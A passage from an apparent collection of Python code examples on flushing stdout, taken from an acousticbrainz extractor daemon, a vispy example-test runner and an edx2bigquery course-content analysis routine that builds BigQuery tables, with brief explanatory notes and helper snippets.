            filtered = []
            for mbid, doc, id in docs:
                if mbid not in in_progress:
                    filtered.append((mbid, doc, id))
            docs = filtered

        if len(docs):
            # Start one document
            mbid, doc, id = docs.pop()
            th = HighLevel(mbid, doc, id)
            th.start()
            print("start %s" % mbid)
            sys.stdout.flush()
            pool[mbid] = th

        # If we're at max threads, wait for one to complete
        while True:
            if len(pool) == 0 and len(docs) == 0:
                if num_processed > 0:
                    print("processed %s docuements, none remain. Sleeping." % num_processed)
                    sys.stdout.flush()
                num_processed = 0
                # Let's be nice and not keep any connections to the DB open while we nap
                # TODO: Close connections when we're sleeping
                sleep(SLEEP_DURATION)

            for mbid in pool.keys():
                if not pool[mbid].is_alive():

                    # Fetch the data and clean up the thread object
                    hl_data = pool[mbid].get_data()
                    ll_id = pool[mbid].get_ll_id()
                    pool[mbid].join()
                    del pool[mbid]

                    try:
                        jdata = json.loads(hl_data)
                    except ValueError:
                        print("error %s: Cannot parse result docuement" % mbid)
                        print(hl_data)
                        sys.stdout.flush()
                        jdata = {}

                    db.data.write_high_level(mbid, ll_id, jdata, build_sha1)

                    print("done  %s" % mbid)
                    sys.stdout.flush()
                    num_processed += 1

            if len(pool) == num_threads:
                # tranquilo!
                sleep(.1)
            else:
                break
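
A daemon like this usually runs with stdout connected to a pipe or a log file, where Python block-buffers output; without the flush after every status line the "start"/"done" messages could sit in the buffer for minutes. Flushing explicitly is one option; others are running the interpreter with -u or setting PYTHONUNBUFFERED=1. A minimal helper capturing the pattern used above (not from the acousticbrainz code):

import sys

def log(msg):
    # print a status line and push it through even when stdout is a
    # block-buffered pipe, as the daemon above does after every print
    print(msg)
    sys.stdout.flush()

log('High-level extractor daemon starting with 4 threads')
log('start some-mbid')       # placeholder identifiers, for illustration only
log('done  some-mbid')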

Example 17

Project: vispy Source File: _runners.py
def _examples(fnames_str):
    """Run examples and make sure they work.

    Parameters
    ----------
    fnames_str : str
        Can be a space-separated list of paths to test, or an empty string to
        auto-detect and run all examples.
    """
    import_dir, dev = _get_import_dir()
    reason = None
    if not dev:
        reason = 'Cannot test examples unless in vispy git directory'
    else:
        with use_log_level('warning', print_msg=False):
            good, backend = has_application(capable=('multi_window',))
        if not good:
            reason = 'Must have suitable app backend'
    if reason is not None:
        msg = 'Skipping example test: %s' % reason
        print(msg)
        raise SkipTest(msg)

    # if we're given individual file paths as a string in fnames_str,
    # then just use them as the fnames
    # otherwise, use the full example paths that have been
    # passed to us
    if fnames_str:
        fnames = fnames_str.split(' ')

    else:
        fnames = [op.join(d[0], fname)
                  for d in os.walk(op.join(import_dir, '..', 'examples'))
                  for fname in d[2] if fname.endswith('.py')]

    fnames = sorted(fnames, key=lambda x: x.lower())
    print(_line_sep + '\nRunning %s examples using %s backend'
          % (len(fnames), backend))
    # op.join('tutorial', 'app', 'shared_context.py'),  # non-standard  (dangling fragment; builds and discards a tuple, no effect)

    fails = []
    n_ran = n_skipped = 0
    t0 = time()
    for fname in fnames:
        n_ran += 1
        root_name = op.split(fname)
        root_name = op.join(op.split(op.split(root_name[0])[0])[1],
                            op.split(root_name[0])[1], root_name[1])
        good = True
        with open(fname, 'r') as fid:
            for _ in range(10):  # just check the first 10 lines
                line = fid.readline()
                if line == '':
                    break
                elif line.startswith('# vispy: ') and 'testskip' in line:
                    good = False
                    break
        if not good:
            n_ran -= 1
            n_skipped += 1
            continue
        sys.stdout.flush()
        cwd = op.dirname(fname)
        cmd = [sys.executable, '-c', _script.format(op.split(fname)[1][:-3])]
        sys.stdout.flush()
        stdout, stderr, retcode = run_subprocess(cmd, return_code=True,
                                                 cwd=cwd, env=os.environ)
        if retcode or len(stderr.strip()) > 0:
            # Skipping due to missing dependency is okay
            if "ImportError: " in stderr:
                print('S', end='')
            else:
                ext = '\n' + _line_sep + '\n'
                fails.append('%sExample %s failed (%s):%s%s%s'
                             % (ext, root_name, retcode, ext, stderr, ext))
                print(fails[-1])
        else:
            print('.', end='')
        sys.stdout.flush()
    print('')
    t = (': %s failed, %s succeeded, %s skipped in %s seconds'
         % (len(fails), n_ran - len(fails), n_skipped, round(time()-t0)))
    if len(fails) > 0:
        raise RuntimeError('Failed%s' % t)
    print('Success%s' % t)
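
The runner flushes stdout immediately before launching each example in a subprocess; any text still sitting in the parent's buffer could otherwise show up after, or interleaved with, the child's output when both write to the same terminal or pipe. A short sketch of the same precaution using the standard library's subprocess module rather than vispy's run_subprocess helper (the script path is hypothetical):

import subprocess
import sys

def run_example(path):
    print('running %s ' % path, end='')
    sys.stdout.flush()              # get our text out before the child writes
    result = subprocess.run([sys.executable, path],
                            capture_output=True, text=True)
    print('.' if result.returncode == 0 else 'F')
    return result.returncode

# run_example('examples/basics/hello_world.py')   # hypothetical path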

Example 18

Project: edx2bigquery Source File: analyze_content.py
def analyze_course_content(course_id, 
                           listings_file=None,
                           basedir="X-Year-2-data-sql", 
                           datedir="2013-09-21", 
                           use_dataset_latest=False,
                           do_upload=False,
                           courses=None,
                           verbose=True,
                           pin_date=None,
                           ):
    '''
    Compute course_content table, which quantifies:

    - number of chapter, sequential, vertical modules
    - number of video modules
    - number of problem, *openended, mentoring modules
    - number of discussion, annotatable, word_cloud modules

    Do this using the course "xbundle" file, produced when the course axis is computed.

    Include only modules which had nontrivial use, to rule out the staff and un-shown content. 
    Do the exclusion based on count of module appearing in the studentmodule table, based on 
    stats_module_usage for each course.

    Also, from the course listings file, compute the number of weeks the course was open.

    If do_upload (triggered by --force-recompute) then upload all accumulated data to the course report dataset
    as the "stats_course_content" table.  Also generate a "course_summary_stats" table, stored in the
    course_report_ORG or course_report_latest dataset.  The course_summary_stats table combines
    data from many reports, including stats_course_content, the medians report, the listings file,
    broad_stats_by_course, and time_on_task_stats_by_course.
    
    '''

    if do_upload:
        if use_dataset_latest:
            org = "latest"
        else:
            org = courses[0].split('/',1)[0]	# extract org from first course_id in courses

        crname = 'course_report_%s' % org

        gspath = gsutil.gs_path_from_course_id(crname)
        gsfnp = gspath / CCDATA
        gsutil.upload_file_to_gs(CCDATA, gsfnp)
        tableid = "stats_course_content"
        dataset = crname

        mypath = os.path.dirname(os.path.realpath(__file__))
        SCHEMA_FILE = '%s/schemas/schema_content_stats.json' % mypath

        try:
            the_schema = json.loads(open(SCHEMA_FILE).read())[tableid]
        except Exception as err:
            print "Oops!  Failed to load schema file for %s.  Error: %s" % (tableid, str(err))
            raise

        if 0:
            bqutil.load_data_to_table(dataset, tableid, gsfnp, the_schema, wait=True, verbose=False,
                                      format='csv', skiprows=1)

        table = 'course_metainfo'
        course_tables = ',\n'.join([('[%s.course_metainfo]' % bqutil.course_id2dataset(x)) for x in courses])
        sql = "select * from {course_tables}".format(course_tables=course_tables)
        print "--> Creating %s.%s using %s" % (dataset, table, sql)

        if 1:
            metainfo_dataset = bqutil.get_bq_table(dataset, table, sql=sql, 
                                          newer_than=datetime.datetime(2015, 1, 16, 3, 0),
                                          )
            # bqutil.create_bq_table(dataset, table, sql, overwrite=True)


        #-----------------------------------------------------------------------------
        # make course_summary_stats table
        #
        # This is a combination of the broad_stats_by_course table (if that exists), and course_metainfo.
        # Also use (and create if necessary) the nregistered_by_wrap table.

        # get the broad_stats_by_course data
        bsbc = bqutil.get_table_data(dataset, 'broad_stats_by_course')

        table_list = bqutil.get_list_of_table_ids(dataset)

        latest_person_course = max([ x for x in table_list if x.startswith('person_course_')])
        print "Latest person_course table in %s is %s" % (dataset, latest_person_course)
        
        sql = """
                SELECT pc.course_id as course_id, 
                    cminfo.wrap_date as wrap_date,
                    count(*) as nregistered,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) nregistered_by_wrap,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) / nregistered * 100 nregistered_by_wrap_pct,
                FROM
                    [{dataset}.{person_course}] as pc
                left join (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as wrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Wrap'
                 )) as cminfo
                on pc.course_id = cminfo.course_id
                
                group by course_id, wrap_date
                order by course_id
        """.format(dataset=dataset, person_course=latest_person_course)

        nr_by_wrap = bqutil.get_bq_table(dataset, 'nregistered_by_wrap', sql=sql, key={'name': 'course_id'})

        # rates for registrants before and during course
        
        sql = """
                SELECT 
                    *,
                    ncertified / nregistered * 100 as pct_certified_of_reg,
                    ncertified_and_registered_before_launch / nregistered_before_launch * 100 as pct_certified_reg_before_launch,
                    ncertified_and_registered_during_course / nregistered_during_course * 100 as pct_certified_reg_during_course,
                    ncertified / nregistered_by_wrap * 100 as pct_certified_of_reg_by_wrap,
                    ncertified / nviewed * 100 as pct_certified_of_viewed,
                    ncertified / nviewed_by_wrap * 100 as pct_certified_of_viewed_by_wrap,
                    ncertified_by_ewrap / nviewed_by_ewrap * 100 as pct_certified_of_viewed_by_ewrap,
                FROM
                (
                # ------------------------
                # get aggregate data
                SELECT pc.course_id as course_id, 
                    cminfo.wrap_date as wrap_date,
                    count(*) as nregistered,
                    sum(case when pc.certified then 1 else 0 end) ncertified,
                    sum(case when (TIMESTAMP(pc.cert_created_date) < cminfo.ewrap_date) and (pc.certified and pc.viewed) then 1 else 0 end) ncertified_by_ewrap,
                    sum(case when pc.viewed then 1 else 0 end) nviewed,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) nregistered_by_wrap,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) / nregistered * 100 nregistered_by_wrap_pct,
                    sum(case when (pc.start_time < cminfo.wrap_date) and pc.viewed then 1 else 0 end) nviewed_by_wrap,
                    sum(case when (pc.start_time < cminfo.ewrap_date) and pc.viewed then 1 else 0 end) nviewed_by_ewrap,
                    sum(case when pc.start_time < cminfo.launch_date then 1 else 0 end) nregistered_before_launch,
                    sum(case when pc.start_time < cminfo.launch_date 
                              and pc.certified
                              then 1 else 0 end) ncertified_and_registered_before_launch,
                    sum(case when (pc.start_time >= cminfo.launch_date) 
                              and (pc.start_time < cminfo.wrap_date) then 1 else 0 end) nregistered_during_course,
                    sum(case when (pc.start_time >= cminfo.launch_date) 
                              and (pc.start_time < cminfo.wrap_date) 
                              and pc.certified
                              then 1 else 0 end) ncertified_and_registered_during_course,
                FROM
                    [{dataset}.{person_course}] as pc
                left join (
                
                # --------------------
                #  get course launch and wrap dates from course_metainfo

       SELECT AA.course_id as course_id, 
              AA.wrap_date as wrap_date,
              AA.launch_date as launch_date,
              BB.ewrap_date as ewrap_date,
       FROM (
               #  inner get course launch and wrap dates from course_metainfo
                SELECT A.course_id as course_id,
                  A.wrap_date as wrap_date,
                  B.launch_date as launch_date,
                from
                (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as wrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Wrap'
                 )
                ) as A
                left outer join 
                (
                 SELECT course_id,
                      TIMESTAMP(concat(launch_year, "-", launch_month, '-', launch_day)) as launch_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as launch_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as launch_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as launch_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Launch'
                 )
                ) as B
                on A.course_id = B.course_id 
                # end inner course_metainfo subquery
            ) as AA
            left outer join
            (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as ewrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Empirical Course Wrap'
                 )
            ) as BB
            on AA.course_id = BB.course_id

                # end course_metainfo subquery
                # --------------------
                
                ) as cminfo
                on pc.course_id = cminfo.course_id
                
                group by course_id, wrap_date
                order by course_id
                # ---- end get aggregate data
                )
                order by course_id
        """.format(dataset=dataset, person_course=latest_person_course)

        print "--> Assembling course_summary_stats from %s" % 'stats_cert_rates_by_registration'
        sys.stdout.flush()
        cert_by_reg = bqutil.get_bq_table(dataset, 'stats_cert_rates_by_registration', sql=sql, 
                                          newer_than=datetime.datetime(2015, 1, 16, 3, 0),
                                          key={'name': 'course_id'})

        # start assembling course_summary_stats

        c_sum_stats = defaultdict(OrderedDict)
        for entry in bsbc['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            cmci.update(entry)
            cnbw = nr_by_wrap['data_by_key'][course_id]
            nbw = int(cnbw['nregistered_by_wrap'])
            cmci['nbw_wrap_date'] = cnbw['wrap_date']
            cmci['nregistered_by_wrap'] = nbw
            cmci['nregistered_by_wrap_pct'] = cnbw['nregistered_by_wrap_pct']
            cmci['frac_female'] = float(entry['n_female_viewed']) / (float(entry['n_male_viewed']) + float(entry['n_female_viewed']))
            ncert = float(cmci['certified_sum'])
            if ncert:
                cmci['certified_of_nregistered_by_wrap_pct'] = nbw / ncert * 100.0
            else:
                cmci['certified_of_nregistered_by_wrap_pct'] = None
            cbr = cert_by_reg['data_by_key'][course_id]
            for field, value in cbr.items():
                cmci['cbr_%s' % field] = value

        # add medians for viewed, explored, and certified

        msbc_tables = {'msbc_viewed': "viewed_median_stats_by_course",
                       'msbc_explored': 'explored_median_stats_by_course',
                       'msbc_certified': 'certified_median_stats_by_course',
                       'msbc_verified': 'verified_median_stats_by_course',
                       }
        for prefix, mtab in msbc_tables.items():
            print "--> Merging median stats data from %s" % mtab
            sys.stdout.flush()
            bqdat = bqutil.get_table_data(dataset, mtab)
            for entry in bqdat['data']:
                course_id = entry['course_id']
                cmci = c_sum_stats[course_id]
                for field, value in entry.items():
                    cmci['%s_%s' % (prefix, field)] = value

        # add time on task data

        tot_table = "time_on_task_stats_by_course"
        prefix = "ToT"
        print "--> Merging time on task data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # add serial time on task data

        tot_table = "time_on_task_serial_stats_by_course"
        prefix = "SToT"
        print "--> Merging serial time on task data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # add show_answer stats

        tot_table = "show_answer_stats_by_course"
        prefix = "SAS"
        print "--> Merging show_answer stats data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # setup list of keys, for CSV output

        css_keys = c_sum_stats.values()[0].keys()

        # retrieve course_metainfo table, pivot, add that to summary_stats

        print "--> Merging course_metainfo from %s" % table
        sys.stdout.flush()
        bqdat = bqutil.get_table_data(dataset, table)

        listings_keys = map(make_key, ["Institution", "Semester", "New or Rerun", "Andrew Recodes New/Rerun", 
                                       "Course Number", "Short Title", "Andrew's Short Titles", "Title", 
                                       "Instructors", "Registration Open", "Course Launch", "Course Wrap", "course_id",
                                       "Empirical Course Wrap", "Andrew's Order", "certifies", "MinPassGrade",
                                       '4-way Category by name', "4-way (CS, STEM, HSocSciGov, HumHistRel)"
                                       ])
        listings_keys.reverse()
        
        for lk in listings_keys:
            css_keys.insert(1, "listings_%s" % lk)

        COUNTS_TO_KEEP = ['discussion', 'problem', 'optionresponse', 'checkboxgroup', 'optioninput', 
                          'choiceresponse', 'video', 'choicegroup', 'vertical', 'choice', 'sequential', 
                          'multiplechoiceresponse', 'numericalresponse', 'chapter', 'solution', 'img', 
                          'formulaequationinput', 'responseparam', 'selfassessment', 'track', 'task', 'rubric', 
                          'stringresponse', 'combinedopenended', 'description', 'textline', 'prompt', 'category', 
                          'option', 'lti', 'annotationresponse', 
                          'annotatable', 'colgroup', 'tag_prompt', 'comment', 'annotationinput', 'image', 
                          'options', 'comment_prompt', 'conditional', 
                          'answer', 'poll_question', 'section', 'wrapper', 'map', 'area', 
                          'customtag', 'transcript', 
                          'split_test', 'word_cloud', 
                          'openended', 'openendedparam', 'answer_display', 'code', 
                          'drag_and_drop_input', 'customresponse', 'draggable', 'mentoring', 
                          'textannotation', 'imageannotation', 'videosequence', 
                          'feedbackprompt', 'assessments', 'openassessment', 'assessment', 'explanation', 'criterion']

        for entry in bqdat['data']:
            thekey = make_key(entry['key'])
            # if thekey.startswith('count_') and thekey[6:] not in COUNTS_TO_KEEP:
            #     continue
            if thekey.startswith('listings_') and thekey[9:] not in listings_keys:
                # print "dropping key=%s for course_id=%s" % (thekey, entry['course_id'])
                continue
            c_sum_stats[entry['course_id']][thekey] = entry['value']
            #if 'certifies' in thekey:
            #    print "course_id=%s, key=%s, value=%s" % (entry['course_id'], thekey, entry['value'])
            if thekey not in css_keys:
                css_keys.append(thekey)

        # compute forum_posts_per_week
        for course_id, entry in c_sum_stats.items():
            nfps = entry.get('nforum_posts_sum', 0)
            if nfps:
                fppw = int(nfps) / float(entry['nweeks'])
                entry['nforum_posts_per_week'] = fppw
                print "    course: %s, assessments_per_week=%s, forum_posts_per_week=%s" % (course_id, entry['total_assessments_per_week'], fppw)
            else:
                entry['nforum_posts_per_week'] = None
        css_keys.append('nforum_posts_per_week')

        # read in listings file and merge that in also
        if listings_file:
            if listings_file.endswith('.csv'):
                listings = csv.DictReader(open(listings_file))
            else:
                listings = [ json.loads(x) for x in open(listings_file) ]
            for entry in listings:
                course_id = entry['course_id']
                if course_id not in c_sum_stats:
                    continue
                cmci = c_sum_stats[course_id]
                for field, value in entry.items():
                    lkey = "listings_%s" % make_key(field)
                    if not (lkey in cmci) or (not cmci[lkey]):
                        cmci[lkey] = value

        print "Storing these fields: %s" % css_keys

        # get schema
        mypath = os.path.dirname(os.path.realpath(__file__))
        the_schema = json.loads(open('%s/schemas/schema_combined_course_summary_stats.json' % mypath).read())
        schema_dict = { x['name'] : x for x in the_schema }

        # write out CSV
        css_table = "course_summary_stats"
        ofn = "%s__%s.csv" % (dataset, css_table)
        ofn2 = "%s__%s.json" % (dataset, css_table)
        print "Writing data to %s and %s" % (ofn, ofn2)

        ofp = open(ofn, 'w')
        ofp2 = open(ofn2, 'w')
        dw = csv.DictWriter(ofp, fieldnames=css_keys)
        dw.writeheader()
        for cid, entry in c_sum_stats.items():
            for ek in entry:
                if ek not in schema_dict:
                    entry.pop(ek)
                # entry[ek] = str(entry[ek])	# coerce to be string
            ofp2.write(json.dumps(entry) + "\n")
            for key in css_keys:
                if key not in entry:
                    entry[key] = None
            dw.writerow(entry)
        ofp.close()
        ofp2.close()

        # upload to bigquery
        # the_schema = [ { 'type': 'STRING', 'name': x } for x in css_keys ]
        if 1:
            gsfnp = gspath / dataset / (css_table + ".json")
            gsutil.upload_file_to_gs(ofn2, gsfnp)
            # bqutil.load_data_to_table(dataset, css_table, gsfnp, the_schema, wait=True, verbose=False,
            #                           format='csv', skiprows=1)
            bqutil.load_data_to_table(dataset, css_table, gsfnp, the_schema, wait=True, verbose=False)

        return

    
    print "-"*60 + " %s" % course_id

    # get nweeks from listings
    lfn = path(listings_file)
    if not lfn.exists():
        print "[analyze_content] course listings file %s doesn't exist!" % lfn
        return

    data = None
    if listings_file.endswith('.json'):
        data_feed = map(json.loads, open(lfn))
    else:
        data_feed = csv.DictReader(open(lfn))
    for k in data_feed:
        if not 'course_id' in k:
            print "Strange course listings row, no course_id in %s" % k
            raise Exception("Missing course_id")
        if k['course_id']==course_id:
            data = k
            break

    if not data:
        print "[analyze_content] no entry for %s found in course listings file %s!" % (course_id, lfn)
        return

    def date_parse(field):
        (m, d, y) = map(int, data[field].split('/'))
        return datetime.datetime(y, m, d)

    launch = date_parse('Course Launch')
    wrap = date_parse('Course Wrap')
    ndays = (wrap - launch).days
    nweeks = ndays / 7.0

    print "Course length = %6.2f weeks (%d days)" % (nweeks, ndays)

    if pin_date:
        datedir = pin_date
    course_dir = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest and not pin_date)
    cfn = gsutil.path_from_course_id(course_id)

    xbfn = course_dir / ("xbundle_%s.xml" % cfn)
    
    if not xbfn.exists():
        print "[analyze_content] cannot find xbundle file %s for %s!" % (xbfn, course_id)

        if use_dataset_latest:
            # try looking in earlier directories for xbundle file
            import glob
            spath = course_dir / ("../*/xbundle_%s.xml" % cfn)
            files = list(glob.glob(spath))
            if files:
                xbfn = path(files[-1])
            if not xbfn.exists():
                print "   --> also cannot find any %s ; aborting!" % spath
            else:
                print "   --> Found and using instead: %s " % xbfn
        if not xbfn.exists():
            raise Exception("[analyze_content] missing xbundle file %s" % xbfn)

    # if there is an xbundle*.fixed file, use that instead of the normal one
    if os.path.exists(str(xbfn) + ".fixed"):
        xbfn = path(str(xbfn) + ".fixed")

    print "[analyze_content] For %s using %s" % (course_id, xbfn)
    
    # get module usage data
    mudata = get_stats_module_usage(course_id, basedir, datedir, use_dataset_latest)

    xml = etree.parse(open(xbfn)).getroot()
    
    counts = defaultdict(int)
    nexcluded = defaultdict(int)

    IGNORE = ['html', 'p', 'div', 'iframe', 'ol', 'li', 'ul', 'blockquote', 'h1', 'em', 'b', 'h2', 'h3', 'body', 'span', 'strong',
              'a', 'sub', 'strike', 'table', 'td', 'tr', 's', 'tbody', 'sup', 'sub', 'strike', 'i', 's', 'pre', 'policy', 'metadata',
              'grading_policy', 'br', 'center',  'wiki', 'course', 'font', 'tt', 'it', 'dl', 'startouttext', 'endouttext', 'h4', 
              'head', 'source', 'dt', 'hr', 'u', 'style', 'dd', 'script', 'th', 'p', 'P', 'TABLE', 'TD', 'small', 'text', 'title']

    problem_stats = defaultdict(int)

    def does_problem_have_random_script(problem):
        '''
        return 1 if problem has a script with "random." in it
        else return 0
        '''
        for elem in problem.findall('.//script'):
            if elem.text and ('random.' in elem.text):
                return 1
        return 0

    # walk through xbundle 
    def walk_tree(elem, policy=None):
        '''
        Walk XML tree recursively.
        elem = current element
        policy = dict of attributes for children to inherit, with fields like due, graded, showanswer
        '''
        policy = policy or {}
        if  type(elem.tag)==str and (elem.tag.lower() not in IGNORE):
            counts[elem.tag.lower()] += 1
        if elem.tag in ["sequential", "problem", "problemset", "course", "chapter"]:	# very old courses may use inheritance from course & chapter
            keys = ["due", "graded", "format", "showanswer", "start"]
            for k in keys:		# copy inheritable attributes, if they are specified
                val = elem.get(k)
                if val:
                    policy[k] = val
        if elem.tag=="problem":	# accuemulate statistics about problems: how many have show_answer = [past_due, closed] ?  have random. in script?
            problem_stats['n_capa_problems'] += 1
            if policy.get('showanswer'):
                problem_stats["n_showanswer_%s" % policy.get('showanswer')] += 1
            else:
                problem_stats['n_shownanswer_finished'] += 1	# DEFAULT showanswer = finished  (make sure this remains true)
                # see https://github.com/edx/edx-platform/blob/master/common/lib/xmodule/xmodule/capa_base.py#L118
                # finished = Show the answer after the student has answered the problem correctly, the student has no attempts left, or the problem due date has passed.
            problem_stats['n_random_script'] += does_problem_have_random_script(elem)

            if policy.get('graded')=='true' or policy.get('graded')=='True':
                problem_stats['n_capa_problems_graded'] += 1
                problem_stats['n_graded_random_script'] += does_problem_have_random_script(elem)
                if policy.get('showanswer'):
                    problem_stats["n_graded_showanswer_%s" % policy.get('showanswer')] += 1
                else:
                    problem_stats['n_graded_shownanswer_finished'] += 1	# DEFAULT showanswer = finished  (make sure this remains true)
            
        for k in elem:
            midfrag = (k.tag, k.get('url_name_orig', None))
            if (midfrag in mudata) and int(mudata[midfrag]['ncount']) < 20:
                nexcluded[k.tag] += 1
                if verbose:
                    try:
                        print "    -> excluding %s (%s), ncount=%s" % (k.get('display_name', '<no_display_name>').encode('utf8'), 
                                                                       midfrag, 
                                                                       mudata.get(midfrag, {}).get('ncount'))
                    except Exception as err:
                        print "    -> excluding ", k
                continue
            walk_tree(k, policy.copy())

    walk_tree(xml)
    print "--> Count of individual element tags throughout XML: ", counts
    
    print "--> problem_stats:", json.dumps(problem_stats, indent=4)

    # combine some into "qual_axis" and others into "quant_axis"
    qual_axis = ['openassessment', 'optionresponse', 'multiplechoiceresponse', 
                 # 'discussion', 
                 'choiceresponse', 'word_cloud', 
                 'combinedopenended', 'choiceresponse', 'stringresponse', 'textannotation', 'openended', 'lti']
    quant_axis = ['formularesponse', 'numericalresponse', 'customresponse', 'symbolicresponse', 'coderesponse',
                  'imageresponse']

    nqual = 0
    nquant = 0
    for tag, count in counts.items():
        if tag in qual_axis:
            nqual += count
        if tag in quant_axis:
            nquant += count
    
    print "nqual=%d, nquant=%d" % (nqual, nquant)

    nqual_per_week = nqual / nweeks
    nquant_per_week = nquant / nweeks
    total_per_week = nqual_per_week + nquant_per_week

    print "per week: nqual=%6.2f, nquant=%6.2f total=%6.2f" % (nqual_per_week, nquant_per_week, total_per_week)

    # save this overall data in CCDATA
    lock_file(CCDATA)
    ccdfn = path(CCDATA)
    ccd = {}
    if ccdfn.exists():
        for k in csv.DictReader(open(ccdfn)):
            ccd[k['course_id']] = k
    
    ccd[course_id] = {'course_id': course_id,
                      'nweeks': nweeks,
                      'nqual_per_week': nqual_per_week,
                      'nquant_per_week': nquant_per_week,
                      'total_assessments_per_week' : total_per_week,
                      }

    # fields = ccd[ccd.keys()[0]].keys()
    fields = ['course_id', 'nquant_per_week', 'total_assessments_per_week', 'nqual_per_week', 'nweeks']
    cfp = open(ccdfn, 'w')
    dw = csv.DictWriter(cfp, fieldnames=fields)
    dw.writeheader()
    for cid, entry in ccd.items():
        dw.writerow(entry)
    cfp.close()
    lock_file(CCDATA, release=True)

    # store data in course_metainfo table, which has one (course_id, key, value) on each line
    # keys include nweeks, nqual, nquant, count_* for module types *

    cmfields = OrderedDict()
    cmfields['course_id'] = course_id
    cmfields['course_length_days'] = str(ndays)
    cmfields.update({ make_key('listings_%s' % key) : value for key, value in data.items() })	# from course listings
    cmfields.update(ccd[course_id].copy())

    # cmfields.update({ ('count_%s' % key) : str(value) for key, value in counts.items() })	# from content counts

    cmfields['filename_xbundle'] = xbfn
    cmfields['filename_listings'] = lfn

    for key in sorted(counts):	# store counts in sorted order, so that the later generated CSV file can have a predictable structure
        value = counts[key]
        cmfields['count_%s' % key] =  str(value) 	# from content counts

    for key in sorted(problem_stats):	# store problem stats
        value = problem_stats[key]
        cmfields['problem_stat_%s' % key] =  str(value)

    cmfields.update({ ('nexcluded_sub_20_%s' % key) : str(value) for key, value in nexcluded.items() })	# from content counts

    course_dir = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest)
    csvfn = course_dir / CMINFO

    # manual overriding of the automatically computed fields can be done by storing course_id,key,value data
    # in the CMINFO_OVERRIDES file

    csvfn_overrides = course_dir / CMINFO_OVERRIDES
    if csvfn_overrides.exists():
        print "--> Loading manual override information from %s" % csvfn_overrides
        for ovent in csv.DictReader(open(csvfn_overrides)):
            if not ovent['course_id']==course_id:
                print "===> ERROR! override file has entry with wrong course_id: %s" % ovent
                continue
            print "    overriding key=%s with value=%s" % (ovent['key'], ovent['value'])
            cmfields[ovent['key']] = ovent['value']

    print "--> Course metainfo writing to %s" % csvfn

    fp = open(csvfn, 'w')

    cdw = csv.DictWriter(fp, fieldnames=['course_id', 'key', 'value'])
    cdw.writeheader()

    for k, v in cmfields.items():
        cdw.writerow({'course_id': course_id, 'key': k, 'value': v})
        
    fp.close()

    # build and output course_listings_and_metainfo 

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    mypath = os.path.dirname(os.path.realpath(__file__))
    clm_table = "course_listing_and_metainfo"
    clm_schema_file = '%s/schemas/schema_%s.json' % (mypath, clm_table)
    clm_schema = json.loads(open(clm_schema_file).read())

    clm = {}
    for finfo in clm_schema:
        field = finfo['name']
        clm[field] = cmfields.get(field)
    clm_fnb = clm_table + ".json"
    clm_fn = course_dir / clm_fnb
    open(clm_fn, 'w').write(json.dumps(clm))

    gsfnp = gsutil.gs_path_from_course_id(course_id, use_dataset_latest=use_dataset_latest) / clm_fnb
    print "--> Course listing + metainfo uploading to %s then to %s.%s" % (gsfnp, dataset, clm_table)
    sys.stdout.flush()
    gsutil.upload_file_to_gs(clm_fn, gsfnp)
    bqutil.load_data_to_table(dataset, clm_table, gsfnp, clm_schema, wait=True, verbose=False)

    # output course_metainfo

    table = 'course_metainfo'
    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    gsfnp = gsutil.gs_path_from_course_id(course_id, use_dataset_latest=use_dataset_latest) / CMINFO
    print "--> Course metainfo uploading to %s then to %s.%s" % (gsfnp, dataset, table)
    sys.stdout.flush()

